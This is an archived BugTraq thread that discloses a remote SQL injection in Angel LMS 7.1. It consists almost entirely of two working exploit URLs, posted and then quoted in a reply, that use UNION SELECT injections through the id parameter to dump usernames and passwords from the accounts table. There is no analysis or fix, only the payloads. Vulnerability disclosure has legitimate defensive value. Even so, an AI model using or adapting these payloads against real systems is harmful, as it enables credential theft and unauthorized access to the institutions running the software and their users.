BugTraq
Back to list
|
Post reply
Angel LMS 7.1 - Remote SQL Injection
Mar 01 2007 04:06PM
Guns inbox com
(1 replies)
# Angel LMS 7.1 Remote SQL Injection
# by Guns
#All User Accounts#
http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20usernam
e%20from%20accounts--"
#Account Passwords#
http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20passwor
d%20from%20accounts--"
[ reply ]
Re: Angel LMS 7.1 - Remote SQL Injection
Mar 01 2007 05:33PM
str0ke (str0ke milw0rm com)
Privacy Statement
Copyright 2010, SecurityFocus
# by Guns
#All User Accounts#
http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20usernam
e%20from%20accounts--"
#Account Passwords#
http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20passwor
d%20from%20accounts--"
[ reply ]